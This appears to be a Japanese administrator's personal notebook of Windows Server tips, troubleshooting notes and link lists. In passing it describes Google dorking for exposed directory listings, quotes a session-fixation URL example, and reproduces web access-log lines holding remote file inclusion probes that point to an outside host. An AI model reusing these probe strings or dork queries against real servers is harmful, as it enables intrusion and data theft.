例) Administrator を回復エージェントに指定する場合
1.administrator でログイン
2.コマンドプロンプトから cipher /r:ファイル名 を実行
(ファイル名.cer と ファイル名.pfx が作成される)
3.gpedit.msc を実行し、グループポリシー管理コンソールを起動
4.[ローカルコンピュータポリシー]>[コンピュータの構成]>[Windowsの構成]>[Windowsの設定]>[セキュリティの設定]>[公開キーポリシー]を選択
5.「ファイルシステムの暗号化」から「データ回復エージェントの追加」を選択
6.ウイザードに従って、作成した「ファイル名.cer」ファイルを読み込む
※作成した cer と pfx ファイルは転用されないように管理すること。
参考資料
EFS を使用したハード ドライブの暗号化でデータを保護する
http://www.microsoft.com/japan/smallbiz/sgc/articles/protect_data_efs.mspx
[HOWTO] Windows Server 2003 Enterprise Server で暗号化ファイル システムを管理する方法
http://support.microsoft.com/kb/324897
グーグル・ハッキング
グーグルには、ファイルを探すコマンドがあるそうで検索窓に
intile: をつけて検索すると、管理の甘いサーバが丸見えなんだとか。
「intitle index of」 で検索すると、そういう使い方をして漁っている人達の多い事。。。
メジャーな手口なんですね…
「intitle:"index of" .avi」で、動画ファイルとか検索できますがトラップの可能性もありそう。
(きんたまウイルスとかに感染するかも)
こうやって盗んでいる人達も居るって事で。。。
GoogleをハッキングしてMP3をダウンロードする方法
http://gigazine.net/index.php?/news/comments/20081105_google_mp3_downloader/
JVN#86092776 BASP21 においてメールの不正送信が可能な脆弱性
http://jvn.jp/jp/JVN%2386092776/
Subject に CRLF インジェクションされる脆弱性が見つかったんだとか。
メールを送信した時のヘッダが
X-Mail-Agent: BSMTP DLL Mar 3 2007 by Tatsuo Baba
になってない場合は、差し替えましょ。
※ 差し替えて IIS6.0 の ASP でメールを送ろうとすると、不明なエラーが発生するっぽい…
↑の修正はされたようですので入れ替えましょう。
メモリが "read" になることはできませんでした
メモリクリーナ常駐させると、なんだか安定…
えらいもんだ。
と思ったら出た。。。
で調べたら、ノートン先生が原因だった。
ウイルス定義ファイルの更新時に「dwhwizrd.exe のアプリケーションエラー・・・」が発生する
http://service1.symantec.com/support/INTER/entsecurityjapanesekb.nsf/jp_docid/pf/20020312150207949
効果ないので、システムログに イベントID26 が発生したら再起動するスプリクトで回避。
RebootEvent26.vbs
'*********************************************************************************
'システムログにイベント ID 26 が発生した場合に再起動
'*********************************************************************************
strComputer = "."
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate, (Security)}!\\" & strComputer & "\root\cimv2")
Set colMonitoredEvents = objWMIService.ExecNotificationQuery("Select * from __instancecreationevent where TargetInstance isa 'Win32_NTLogEvent' and TargetInstance.EventCode='26'")
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
strAlertToSend = objLatestEvent.TargetInstance.User & " attempted to access DatabaseServer."
reboot
Loop
'*********************************************************************************
'コンピュータの再起動は以下でも可能。
'shutdown.exe
'C:\Windows\Rundll32.exe Shell32.dll,SHExitWindowsEx 1
'*********************************************************************************
sub reboot()
Set objSystemSet = GetObject("winmgmts:{impersonationLevel=impersonate,(Shutdown)}").InstancesOf("Win32_OperatingSystem")
For Each objSystem In objSystemSet
objSystem.Win32Shutdown 2
Next
end sub
中国ユーザーを激怒させたシマンテック「誤作動問題」の事後対応
http://it.nikkei.co.jp/internet/news/index.aspx?n=MMITbp000005062007Windows
Server 2003 または Windows XP SP2 を実行しているコンピュータに修正プログラムをインストールした後に、 Symantec ウイルス がウイルスは検出できません。
http://support.microsoft.com/kb/933215
ノートン先生ヤブすぎ。。。
2007年 11月 22日 rev.22 以降のウイルス定義ファイルの更新に失敗する
http://service1.symantec.com/support/inter/entsecurityjapanesekb.nsf/jp_docid/20071128121600949?OpenDocument&dtype=corp
11月21日から更新が止まってた…
普段見ないから気づきませんよ。
エンドポイントなんちゃらも、メモリーリーク起こしてダメぽ。
ウイルスバスター、マカフィにしても似たようなもんなんでしょうけどね。。。
いきなり新しい機能が実装されているような物には注意しましょうね。
PC 壊すリスクの方が高いですよ。
Windows Server 2003 ベースのコンピュータのエラー メッセージ:「STOP」 0x0000008E
http://support.microsoft.com/kb/947479/ja
Symantec ウイルス ソフトウェアがインストールされる Windows Server 2003ベースの
コンピュータに停止エラー メッセージ:「 0x0000007f を停止する」
http://support.microsoft.com/kb/947471/ja
あと、Endpoint Protection はアンインストールしてもレジストリにゴミが残って PC が重くなりますのでご注意を。
期限が切れたアンチウイルス製品並みに性質が悪い。(該当レジストリを削除すると直りましたが)
マカフィやウイルスバスターも似たようなもんですけどね。
アンチウイルスソフトはレジストリのバックアップを取ってから、入れましょう。
アンインストールも、使う前に試しておいた方がいいかも。
Norton 削除ツール (Norton Removal Tool) を使う方法
http://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953
Winows Server 2003 SP2 の ASP でアップロード
コードページの記述をしないと、文字化けするようになったっぽい。(IE7 との組み合わせ?)
Shift-JIS
<%@ Language=VBScript ENABLESESSIONSTATE=False CODEPAGE=932 LCID=1041 %>
Response.CharSet = "Shift-JIS"
そのうちこっちでまとめるよてい。
asp.html
単純に IE7 の問題っぽ。
リクエストに UTF8 を使うから、Shift-JIS 以外の文字が来た時に文字化けしてた感じかな。
UTF-8 で保存した HTML で Shift-JIS な XML を読み込むと VISTA 以外の IE は固まるんですけど・・・
へんなコードは書いてないんだけどなぁ、、、
UTF-8 な XML 読んでも固まった。orz
ASP から XML ファイル作成してそれを返すとアウトっぽいような…
Microsoft Internet Explorer unspecified denial of service
http://xforce.iss.net/xforce/xfdb/33715
↑
まさにこれ。。。
GPS
「百分率表記」と「度分秒表記」がある。
度分秒表記 ⇒ 百分率表記 は、[分]/60+[秒]/3600
度分表記 ⇒ 度分秒表記 は、小数点以下を 60 で掛ける。
.NET向けGISライブラリ「SharpMap」
ASP.NET でも Windows アプリケーションでも動作。
携帯でのネット、、、
普段 PC にメールを送って来ない友人が、携帯からメールを送ってきたんですけど
その時、本文に名前とか書いてなくて誰だか不明で、返信メールに「誰?」って
返したら、すげー怒ってた…
ケータイ文化圏とネット文化圏の深い溝
http://www.kotono8.com/2006/10/25mobile.html
パソコン見放す20代「下流」携帯族
http://facta.co.jp/article/200703060.html
パソコンを使わない「純血ケータイ族」
http://www.netadreport.com/blog/2007/04/blog-post_17.html
携帯電話のみのネットユーザーは低レベルじゃない
http://japan.cnet.com/column/netad/story/0,3800075540,20350532,00.htm
携帯電話で人間に感染するウイルス発生?
http://slashdot.jp/security/article.pl?sid=07/04/17/2245240
学校裏サイトで、今何が行われているのか〜子どもとケータイの闇 子どもとセキュリティ(4)
http://www.nikkeibp.co.jp/sj/interview/83/index.html?cd=sjm
中学生とケータイ。
http://ameblo.jp/nippau/entry-10033006733.html
ケータイだけでインターネットを利用するユーザーの実態調査(上)--「今後PCも利用したい」が55%
http://japan.cnet.com/research/column/webreport/story/0,3800075674,20351511,00.htm
ケータイWebはそろそろ危険
http://takagi-hiromitsu.jp/diary/20070624.html#p01
「プロフ」の何が問題か (1/3)
http://plusd.itmedia.co.jp/lifestyle/articles/0810/15/news013.html
PC と違う検索ユーザーの衝動的欲求
http://japan.internet.com/busnews/20070405/8.html
ケータイ検索が“使えない”理由
http://www.itmedia.co.jp/anchordesk/articles/0704/25/news057.html
携帯電話の検索に関する調査--ユーザーは検索結果も“比較”している!?
http://japan.cnet.com/research/column/webreport/story/0,3800075674,20346209,00.htm
“検索”でケータイインタ−ネットが活発に
http://japan.internet.com/wmnews/20070419/5.html
ドコモ、デコメール利用動向を調査
http://k-tai.impress.co.jp/cda/article/news_toppage/34203.html
個人情報を流出させてしまうと…「一気に信頼低下&客足遠のく」- 英調査
http://journal.mycom.co.jp/news/2007/04/19/010/index.html
ネット・オークションでの消費者の生活意識が浮き彫りに - ネット生活予測
http://journal.mycom.co.jp/news/2007/04/21/004/
ネット・オークション生活の拡大と、消費意識の新しいカタチが明らかに
http://journal.mycom.co.jp/news/2007/04/20/028/
ポイントサイト利用者は6割、ポイントは「交換」より「換金」
http://internet.watch.impress.co.jp/cda/news/2007/04/19/15486.html
1台の携帯電話で2番号・2アドレス、48.3%が「利用したい」− アイシェア調べ
http://itm-asp.com/cc/2261/BS568U7m
約半数が「他人の携帯機種が気になる」
http://www.j-cast.com/2007/06/15008450.html
あおれば売れる? 携帯メールと通販の関係
http://www.itmedia.co.jp/anchordesk/articles/0706/11/news021.html
【編集長コラム「雑誌作りの舞台裏」】パソコンは「善」、ケータイは「悪」
http://pc.nikkeibp.co.jp/article/NPC/20070622/275544/
ケータイ業界に大変化、キャリアの収益モデル見直し求める--モバ研報告書
http://japan.cnet.com/news/com/story/0,2000056021,20351641,00.htm
あなたのケータイやブログは大丈夫か――ネット時代の著作権考 (1/2)
http://www.itmedia.co.jp/enterprise/articles/0706/27/news029.html
ゲームの一画面は知財保護の対象になるのか?
http://www.nikkeibp.co.jp/news/it07q2/531936/
年代に関わらず、実は平均5割が「携帯でネット」派
http://business.nikkeibp.co.jp/article/manage/20071010/137308/
ケータイユーザーの“本音”
http://k-tai.impress.co.jp/cda/article/interview/42297.html
【溶けゆく日本人】快適の代償(1) 待てない人々 数分間でイライラ
http://sankei.jp.msn.com/life/lifestyle/071113/sty0711130811000-n1.htm
「便利になるとストレスが上昇する」という不思議なジレンマ
http://satoshi.blogs.com/life/2007/11/blackberry.html
超便利! ビジネスに役立つ無料ツール:公開画像のExif情報にご注意!「JPEG Cleaner」と「JpegAnalyzer Plus」
http://internet.watch.impress.co.jp/cda/biz_tool/2008/06/17/19953.html
市場規模は1兆円台に! 〜拡大し続けるモバイルコンテンツ市場〜
http://japan.cnet.com/mobile/story/0,3800078151,20379756,00.htm
[Gamefest 08#02]ダウンロードコンテンツで儲けるには? アイマス開発者が語るダウンロード販売成功の秘訣
http://www.4gamer.net/games/052/G005257/20080904039/
どこかのゲーム機で X68000 の名作を遊べるようにしてくれませんかね・・・
平成生まれ中学生のケータイの使い方
http://www.nikkeibp.co.jp/article/news/20081030/108638/
携帯サイト利用時に偽の個人情報を登録する人が43%
http://www.nikkeibp.co.jp/article/column/20081215/119705/
セキュリティキーワード2009~モバイルサイト | LAC
http://www.lac.co.jp/special/keyword2009/endo.html
2007年5月のパッチ適用後 File Server for Macintosh サービスが起動しなくなった…
MS07-029 がくさい。
NetBIOS サービス 無効
NetBEUI サービス 無効
NetBIOS over TCP/IP 有効
に設定後、 File Server for Macintosh サービスを手動で起動したら開始された。
ソース: MacFile
イベント ID: 10001
ソース: MacFile
イベント ID: 10027
ソース: MacFile
イベント ID: 10021
ソース: Service Control Manager
イベント ID: 7024
管理用共有が見つからない場合に発生する問題の概要
http://support.microsoft.com/kb/842715
Microsoft Windows Server 2003 サポートページ
うむぅ…
--------------------------------------------
イベントの種類: エラー
イベント ソース: Service Control Manager
イベント カテゴリ: なし
イベント ID: 7009
説明:
SQL Server Agent (MSSQLSERVER) サービスへの接続中にタイムアウト (30000 ミリ秒) になりました。
--------------------------------------------
イベントの種類: エラー
イベント ソース: Service Control Manager
イベント カテゴリ: なし
イベント ID: 7000
説明:
SQL Server Agent (MSSQLSERVER) サービスは次のエラーのため開始できませんでした:
そのサービスは指定時間内に開始要求または制御要求に応答しませんでした。
--------------------------------------------
イベントの種類: 警告
イベント ソース: NETLOGON
イベント カテゴリ: なし
イベント ID: 5804
説明:
Netlogon Parameters レジストリ キーに含まれている、パラメータ 'MaximumPasswordAge' の値 0x0 は無効です。
このパラメータの最小値は 0x1 で、最大値は 0xf4240 です。
0x1 の値がこのパラメータに割り当てられています。
--------------------------------------------
イベントの種類: エラー
イベント ソース: Schannel
イベント カテゴリ: なし
イベント ID: 36882
説明:
リモート サーバーから受信した証明書は、信頼されていない証明機関によって発行されています。
このため、この証明書に含まれているデータはどれも検証できません。
SSL 接続の要求に失敗しました。添付されたデータにサーバー証明書が含まれています。
Windows XP で、Microsoft LDAP API を使用して SSL 接続経由で LDAP サーバーに接続できない
http://support.microsoft.com/kb/835208/ja
--------------------------------------------
MusicID
便利になったもんですね・・・
MusicIDでタグ情報の取得
http://homepage3.nifty.com/nanahoshi/analog/qmp/qmp.html
セカンドライフ
地球シミュレーターでスマトラ沖の津波の映像出ていましたけど
あれをセカンドライフの仮想都市作で震災シミュレーションの
アトラクションとして作る事が出来ればウケそうだと思うけど。
これ読んでる技術者の人作って(笑)
競争相手が少なそうな PS3 でもいいから。
SecondLifeの仮想通貨流通量、2008年に1.25兆円--総加入者は2億5000万人に
http://japan.cnet.com/news/media/story/0,2000056023,20349764,00.htm
RMTビジネスの法的問題について
http://itpro.nikkeibp.co.jp/article/Watcher/20070518/271542/
Windows のコードページ取得と変更
確認
コマンドプロンプトで
c:\>chcp
現在のコード ページ: 932
UTF-8 に変更
c:\>chcp 65001
Code Page Identifiers
http://msdn2.microsoft.com/en-us/library/ms776446.aspx
※コマンドプロンプト内だけ有効っぽい。
Shift-JIS から UFT-8 に変換する程度しか使い道なし?
c:\>chcp 65001
c:\>type index.html > index2.html
ちなみに、EN-US の場合は、us と打てば変わる。
AppLocale Utility
http://www.microsoft.com/downloads/details.aspx?FamilyID=8c4e8e0d-45d1-4d9b-b7c0-8430c1ac89ab&DisplayLang=ja
Windows XP や Windows Server 2003 で Unicode 非対応の
他言語のアプリケーションを動作させるためのツール。
LCID を スプリクトで確認するには GetLocale/SetLocale を利用する。
コード ページ
http://msdn.microsoft.com/library/ja/vclib/html/_crt_code_pages.asp
Wscript.Echo GetLocale
SetLocale("en-au")
Wscript.Echo GetLocale
Wscript.Echo FormatDateTime(Now(),vbLongDate)
こんなかんじ。
地域のオプションで、該当する言語表示が有効になっていないと多分使えない。
IE7 のフィードを活用する。
http://www.microsoft.com/japan/rss/
取りあえず、フィードカテゴリからサポートを選択。
「このフィードを購読する」で、、、
Windows RSS プラットフォームの紹介
http://www.microsoft.com/japan/msdn/ie/ie7/msfeeds_ovw.aspx
Webサイトをトラッキングする簡単なスクリプト
http://www.itmedia.co.jp/enterprise/articles/0706/20/news010.html
IE だとブックマークのプロパティに「オフラインで使用する」ってのがあります。
これは、更新された場合にメールで通知する機能もありますよね。
Windows 2003 Server SP2 でアプリケーションの削除が出来ない…
アプリのバグかと思ったら...
Windows Server 2003 SP2 に、コントロール パネルの「アプリケーションの追加と削除」項目の Service Pack の「削除」ボタンは使用できません。
http://support.microsoft.com/kb/937996
セーフモード環境で Windows インストーラアプリケーション(*.msi)を追加したり削除したりする場合の手順
セーフモードでは、MSIServer サービスが開始されないので
(サービスからの開始は禁止されていますので機能しません)
可能にするにはレジストリキーに追加します。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
値の名前: MSIServer
値 : Service
XP 以降の場合は REG.exe コマンドを利用して追加可能。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer /ve /d Service
TVersity
http://tversity.com/home/
WMV や DIVX を PS3 で再生できるようになる。
Windows Srever 2003 にインストール可能。
詳しくは検索エンジンで。。。
自宅PCをメディアサーバー化して外出先からストリーミング再生できる「Orb」
http://www.forest.impress.co.jp/article/2007/06/25/orb.html
Media Centerで録画した番組も自動変換、新しいImage Converter 3が登場
http://journal.mycom.co.jp/news/2007/06/22/020/
Windows7 を使って PS3 や XBOX360 で再生させる動画を作るには
24fps 2PASS でOK。(TMPEGEnc4.0 XPress で確認)
30fps までならいけるかも。
ポイントマジック
ポイントは絶対儲かる金の卵。囲い込みだけじゃない大人の事情
http://web-tan.forum.impressrd.jp/e/2007/06/28/1542
例えば、20万円の TV を購入して 20% ポイントが付くと 4万円 ですけど
元々 16万円で買える商品だとすると、この商品をポイントで購入したばあい
ポイント購入にポイントは付きませんので 20万円分のポイントを使って購入
することになり事実上、4万円損した事に。。。
安く買ったつもりでもポイントを消費した時点でお得感は無くなり、、、
店側は、ポイントで利益を上げている訳ですね。
すごい儲かるらしく、商品の値段を下げずにポイントを使って
安く見せかけるオトナの理由も含まれているのかもしれません。
ポイントカード制による会計処理の裏側
http://okamot.com/mt/archives/2004/07/post-309.html
バルクの HDD に USB ケーブル繋げただけのやつ・・・
抜き差しをしなければ問題無いと思いますが、重要なデータは USB HDD に保存しない方が良いですよ。。。
マウントに失敗してデータが吹き飛びました。ファイナルデータで救済も 1 件も HIT せず。orz
フォーマットがダイナミックだったのが悪いのか USB が悪いのか、HDD につけてるケーブルが粗悪なのか
判りませんけど、、、
後から聞いた話ですが、そうなった場合でも諦めずに Windows 2000 で繋ぐと見れるらしい。。。
【インタビュー】クリエイターに最適なハードディスクを考えるウエスタンデジタル社長に聞く
http://journal.mycom.co.jp/articles/2007/06/29/hdd/
ハードディスクそのもののデータは守れないか
http://www.nikkeibp.co.jp/sj/special/199/index.html?cd=sjm
断片化を爆速で処理する無料デフラグソフト「Auslogics Disk Defrag」
http://gigazine.net/index.php?/news/comments/20070619_auslogics_disk_defrag/
Samsung、1.8インチ 64GB ソリッドステートドライブの量産を開始
http://journal.mycom.co.jp/news/2007/06/26/002/
Seagate、1テラバイトHDDを発表
http://www.itmedia.co.jp/enterprise/articles/0706/26/news048.html
サポートに問い合わせた時のメールに担当者の名前が書かれてない時。
ちょっと気になったので。
こっちが名乗っているのに名乗らないのは、自分の発言に責任を持ちたくないのかな〜っと
想像して余り良い印象を与えないと思うんですけど…
みなさんは、どう思います?
冷やかしとかが多く 2ch や Blog で晒されたりしたくない、って所なんでしょうけど。。。
メール送る時は、担当者名くらい書くのが筋って事で。
実録・ネットで叩かれたときの対処法!(ココロ社)
http://d.hatena.ne.jp/kokorosha/20070627#p1
ネットでの「祭り」を取材して=岩佐淳士(社会部)−記者の目
http://www.mainichi-msn.co.jp/eye/kishanome/news/20070628ddm004070092000c.html
EZwebサイトでSession Fixation被害発生か?
http://takagi-hiromitsu.jp/diary/20070629.html#p01
|いくつかのサーバ(たとえばJRun)は、URLに書かれた任意のセッションIDを
|受け入れ、それをcookieとしてブラウザに発行し返す。たとえば、
| http://online.worldbank.dom/?jsessionid=1234
|というリクエストを出すことは、セッションcookie「JSESSIONID」を「1234」
|にセットし、そのサーバにそのIDで新たなセッションを作成する。
|
|この脆弱性を持つWebアプリサーバとしてはPHPが最も有名であり、PHPセキュリティ界隈
|では「session.use_only_cookies をオンに設定する」ことが鉄則として叫ばれている。
|しかし、PHPだけでなく、上の文献にも書かれているように、J2EEのWebアプリサーバにも
|同様の挙動をするものがあるらしい*3。
へー。
たまに HTML の後ろに変なパラメータ付いたアクセスが在ったりしますねぇ。。。
なぜPHPアプリにセキュリティホールが多いのか?
第11回 スクリプトインジェクションを防ぐ10のTips
http://gihyo.jp/dev/serial/01/php-security/0011
XSSを削除し、非推奨の要素を変換! - HTMLフィルタ「HTML Purifier 2.0」
http://journal.mycom.co.jp/news/2007/06/22/019/
新版の「セキュア・プログラミング講座」
http://www.ipa.go.jp/security/awareness/vendor/programmingv2/web.html
JPCERT マルウェア、及びボットネットの研究資料各種を公開
http://www.jpcert.or.jp/research/index.html#botnet
葉っぱ日記
http://d.hatena.ne.jp/hasegawayosuke/20070627/p1
ここが危ない!Web2.0のセキュリティ: 第1回 Ajaxとクロスサイトスクリプティング
http://gihyo.jp/dev/serial/01/web20sec/0001?page=1
IE7のセキュリティ機能の実力を知る
http://www.nikkeibp.co.jp/news/it07q2/538067/
(1)ActiveXコントロールの実行をオフにする
(2)「拡張子ではなく,内容で開く」を無効化する
(3)「常に新しいタブでポップアップを開く」に設定する
後は
・VirtualPC 内でネットサーフィンする
・マカフィ サイトアドバイザーも試してみる
日本HP,期間限定でサーバー機を1万円台で販売
http://itpro.nikkeibp.co.jp/article/NEWS/20070628/276187/
やす…
HP は PCIe x16 が付いていますし、お買い得かも。(DELL は PCIe x8 しか付いていません)
日本HP - ホップ・ステップ・ジャンプ キャンペーン
http://h50146.www5.hp.com/products/servers/proliant/campaign/hopstep.html
|ご好評をいただいている『ホップ・ステップ・ジャンプキャンペーン』が、さらにお得になりました。
|2007年9月27日(木)までの期間限定で、HP ProLiant ML100シリーズがモデルによって税抜き価格から
|なんと2万円〜5万円 OFF!!しかも全モデルともHDD標準搭載です!
|たとえば、HP ProLiant ML115がProLiantサーバ史上最安値の \18,900(税込)〜となります!!
ウィキペディア
http://ja.wikipedia.org/wiki/Intel_Core_2
によると
Athlon 64 X2 5000+(2.6GHz)と Core 2 Duo E6600(2.4GHz)
Athlon 64 X2 4200+(2.2GHz)と Core 2 Duo E6300(1.86GHz)
辺りが同等性能っぽいですね。
AMD にも資料がありました。
http://www.amd.com/us-en/assets/content_type/DownloadableAssets/AMD_v_Intel_Performance_Comp_Q2-2006.pdf
一番安い
AMD Athlon 64 プロセッサ 3500+ (2.2GHz、512KB L2)
でも、PentiumD 930(3.0GHz)より速いようです。
仮想化技術である AMD-V は、Athlon が非対応っぽいので
購入する場合は Opteron プロセッサを選択する事になるかな?
AMD Virtualizationについて
http://www.amd.com/jp-ja/Processors/ProductInformation/0,,30_118_8796_14287,00.html
【対抗デモ第4弾】Athlon 64 X2 5600+ vs Core 2 Duo E6600 [coneco.net]
http://www.coneco.net/akibacheck/006/
SSD
SSDへの期待と課題
http://pc.watch.impress.co.jp/docs/2007/0521/hot487.htm
SSDをデスクトップPCで使ってみる
http://www.watch.impress.co.jp/akiba/hotline/20070623/sp_ssd.html
・書き換え可能回数がある
・書き込みが遅い
3.5インチの起動用に使うメリットは少ないっぽい…
これなら買える!32GBで1万5000円のSSDをテスト
http://pc.nikkeibp.co.jp/article/news/20080903/1007682/
Intel純正SSDは本当にバカッ速なのか!? 「Intel X25-M」速報プレビュー
http://journal.mycom.co.jp/articles/2008/09/09/x25m/index.html
転送速度はHDDの20倍、今までの常識を覆す速度のSSDが登場へ
http://gigazine.net/index.php?/news/comments/20081007_fusion_io/
Windows Vista ベースまたは Windows Server 2008 ベースのコンピュータ アクセス固体ドライブ (SSD) ディスクがコンピュータにインストールされていると、パフォーマンスの低下が発生します。
http://support.microsoft.com/kb/960735/
OS を乗せかえる機会があり、ついでに SSD にしてみました。
これは、いいですねぇ・・・
Windows の再起動が10秒ぐらいですよ。。。
起動ドライブは容量少なくていいでしょうから興味がある人は換装してみては?
仮想化(VHD ファイル)を置くのも良いかも。
PCI覚え書き
カード
32bitPCI
┗━┛┗━━━━┛┗━┛ 3.3V、5V両方対応
┗━━━━━━━┛┗━┛ 5V専用
┗━┛┗━━━━━━━┛ 3.3V専用
64bitPCI
┗━┛┗━━━━┛┗━┛┗━━━━┛ 3.3V、5V両方対応
┗━━━━━━━┛┗━┛┗━━━━┛ 5V専用
┗━┛┗━━━━━━━┛┗━━━━┛ 3.3V専用
スロット
32bitPCI
┏━━━━━━━━━━┓3.3V、5V両方対応
┗━━━━━━━━━━┛
┏━━━━━━━┳━━┓5V専用
┗━━━━━━━┻━━┛
┏━━┳━━━━━━━┓3.3V専用
┗━━┻━━━━━━━┛
64bitPCI
┏━━━━━━━━━━┳━━━━━┓3.3V、5V両方対応
┗━━━━━━━━━━┻━━━━━┛
┏━━━━━━━┳━━┳━━━━━┓5V専用
┗━━━━━━━┻━━┻━━━━━┛
┏━━┳━━━━━━━┳━━━━━┓3.3V専用
┗━━┻━━━━━━━┻━━━━━┛
便利そうだったので、2ch から頂戴してきた。
/default.asp/link_php=http:/www.fattyisjunk.com/sohoadmin/client_files/shopping_cart/canboy1
/default.asp/forum_php=http:/www.fattyisjunk.com/sohoadmin/client_files/shopping_cart/canboy1
何ですか、このへんなアクセスログは...
ついでだから、デフォルトの 404 ページを変更しておく。
もう少しヒネリが欲しい所だけどw
google で簡単に作れるみたいですね。
効果的な404ページを自動生成してくれるGoogleの『Custom 404 pages』
http://www.ideaxidea.com/archives/2008/09/404googlecustom_404_pages.html
地上デジタル
ナナオの 24 インチのモニターを購入して作業環境が改善された。
1920x1200 はかなり快適。
が、PC が壊れそう。。。マザーのコンデンサが膨らんでたり、なんか液漏れてる…
地デジ番組の「コピーワンス」規制に抜け道
http://www.yomiuri.co.jp/net/frompc/20070705nt0c.htm
デジタル放送番組、コピー9回までOK…総務省が要請へ
http://www.yomiuri.co.jp/atmoney/news/20070707it01.htm
【番外編】コピー9回……果たして多いのか少ないのか?
http://arena.nikkeibp.co.jp/article/column/20070720/1001663/?mail=npc
「1世代コピー9th」では誰も幸せになれない (1/3)
http://plusd.itmedia.co.jp/lifestyle/articles/0707/23/news009.html
なんとも中途半端な…
PC で録画するユーザは海外のキャプチャカード使ってるんじゃないの?
という気がしないでもない。
画質安定装置 ってものあるのでアナログな HDD レコーダも大丈夫。(何が?)
「ダビング10」への対処方法は?
http://pc.nikkeibp.co.jp/article/knowhow/20091028/1019944/?set=ml
どうやら PC が壊れた場合、今まで録り溜めした物は全て見れなくなるそうです・・・
BIOS のアップデートでも見れなくなったとかなんとか、、、
MS07-040(KB928365)が適用出来ない…
どうやら、CD(DVD) のドライブパスの問題らしい。
Windows 2000、Windows Server 2003 および Windows XP 用 .NET Framework 2.0 System.Web.dll および Mscoree.dll セキュリティ更新プログラム
http://www.microsoft.com/downloads/details.aspx?FamilyId=BA3CEB78-8E1B-4C38-ADFD-E8BC95AE548D&displaylang=ja
Windows Server 2003 x64 Edition を実行しているコンピュータに .NET Framework 2.0 用のセキュリティ更新プログラムをインストールするときに、エラー メッセージ "Error 1324. フォルダ パス 'Program Files' に使用できない文字が含まれています" が表示される
http://support.microsoft.com/kb/923101
もしくは
Windows Installer CleanUp ユーティリティを使って .NET Framework の構成情報を全て削除後、再インストール。
ソフトウェアレイド5
設定ミスって解除しちゃった。
これ、データの救済出来ないんですよね。トホホ
誤って解除した時の再アクティブ化する救済処置がほしいです!
と言うことで、何処に保存していようが消える時は消えちゃいますので
新しいサービスとして共有同期でみんなで保管で分散化を・・・
レイドみないなイメージをネットワークで。
SNS 等で知り合いの PC へ保管させてもらえば結構便利な気がする。
もちろん、マスターは自分で保管。
っていうサービスを何処か始めて下さい・・・
また、やってもた。。。
パッチ適用後に、再起動処理でシャットダウンしない(30分待っても)
強制リセットしてやったら、ソフトウェアレイドのドライブの共有設定が消えた!
DFS の構成も、、、
共有フォルダ再構成しなおした。
DFS はアクセス権を振りなおしてからサービス再起動で復活。
net stop dfs & net start dfs
MS のソフトウェアレイド微妙すぎる。
Windows Vista の ユーザー アカウント コントロール をすると、
プログラムがネットワークの一部の場所にアクセスすることができません。
http://support.microsoft.com/kb/937624/ja
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
値の名前 : EnableLinkedConnections
データ型 : REG_DWORD
値 : 1
※値の作成後に有効になるので再起動は不要
現象再現
1. 管理者でログイン
2. コマンドから net use x:\\<サーバ>\<共有名> でマッピング
3. メモ帳を右クリックの「管理者として実行」から開く
4. ファイル>開く で、x ドライブを参照... 存在しない。
UAC が ON の場合デスクトップセッションが「一般ユーザ用」「管理者用」の 2 つのデスクトップが
存在する事になり Administrator 権限が付いたユーザでも通常時は Users グループと同等の
権利、権限しか与えられない為にこういった現象が発生するらしい。。。
OpenID
将来、メルマガとかの登録は統一される?
OpenIDの仕様と技術
http://www.atmarkit.co.jp/fsecurity/rensai/openid01/openid01.html
第4回 OpenIDをとりまくセキュリティ上の脅威とその対策
http://www.atmarkit.co.jp/fsecurity/rensai/openid04/openid01.html
最新仕様「OpenID 2.0」が公開
http://www.atmarkit.co.jp/news/200712/06/openid.html
OpenIDとは
http://openid.yahoo.co.jp/
OpenIDに関する調査--OpenIDの利用率はわずか1.2%
http://japan.cnet.com/research/column/webreport/story/0,3800075674,20369375,00.htm
Windows Live ID、OpenID対応へ
http://digitallife.jp.msn.com/article/article.aspx/genreid=102/articleid=354370/
Google,MSに続きOpenIDアカウントの提供を開始
http://itpro.nikkeibp.co.jp/article/NEWS/20081030/318117/
OpenIDファウンデーション・ジャパンが発足 - 国内企業32社が参加
http://journal.mycom.co.jp/news/2008/10/30/052/
どこもかしもも OpenID ですか。
情報が漏れた際の被害が大変な事にならないかい?
クレジットカードや銀行口座を扱うサイトで採用されたら嫌だなぁ…
Windows Vista のエフェメラルポートを一時的に変更する。
netsh interface ipv4 set DynamicPortRangeProtocol=tcp StartPort=1024 NumberOfPorts=5000 Store=active
Windows Vista のエフェメラルポート(デフォルト 49152-65535)を
一時的に、1024-5000 に変更
※ Store=persistent とすると再起動しても設定が保持されるが、インターネット標準の厳格な仕様から外れる。
RPC で特定のポートが使用されるように構成する方法、および IPSec を使用してそれらのポートをセキュリティで保護する方法
http://support.microsoft.com/kb/908472/ja
Windows ベースのコンピュータでの TCP ネットワーク ポートへバインドするのを試みるプログラムを使用すると、 Winsock エラー メッセージ:「 WSAEADDRINUSE(10048)」
http://support.microsoft.com/kb/943710/ja
ついでに、telnet を使う場合は
コントロールパネル
>プログラム
>プログラムと機能
>Windowsの機能の有効化または無効化
から「Telnet クライアント」のチェックを入れる。
VistaでTelnetクライアントを利用する
http://www.atmarkit.co.jp/fwin2k/win2ktips/960vistelnet/vistelnet.html
第3回 脆弱なホストを狙った不正中継を見抜く
http://www.atmarkit.co.jp/fsecurity/rensai/handling03/handling01.html
|ここ数年はHTTP CONNECTメソッドを用いて、スパムなどのSMTPメール
|を送るという不正中継の通信もよく目にするようになった。
|
|「HTTPなのにSMTPの通信?」と思われるかもしれないが、
|HTTP/1.1(RFC 2616)のCONNECTメソッドを用いることで、
|SMTPに限らずTCPの通信をトンネリングさせることができる。
Web サーバへ SMTP のアラートが大量に上がって
ずっと不思議に思ってたんですが、こういう事だったんですね・・・
Internet Explorer の印刷でヘッダやフッタをカスタマイズ
文字 印刷する内容
&w ウィンドウ タイトル
&u ページのアドレス (URL)
&d 短い形式の日付 (コントロール パネルの [地域と言語のオプション] で指定する形式)
&D 長い形式の日付 (コントロール パネルの [地域と言語のオプション] で指定する形式)
